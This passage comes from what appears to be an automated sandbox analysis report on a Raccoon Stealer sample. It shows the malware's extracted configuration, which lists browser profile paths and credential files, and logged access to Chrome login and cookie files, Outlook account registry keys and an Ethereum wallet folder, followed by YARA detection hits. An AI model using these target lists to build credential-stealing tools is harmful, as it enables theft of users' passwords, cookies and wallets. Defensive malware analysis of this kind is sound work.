Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Mustang
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum

Tries to steal Mail credentials (via file access)

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Remote Access Functionality:

Yara detected Raccoon Stealer

Source: Yara match	File source: 0.2.eLZzxG56uH.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eLZzxG56uH.exe PID: 3340, type: MEMORYSTR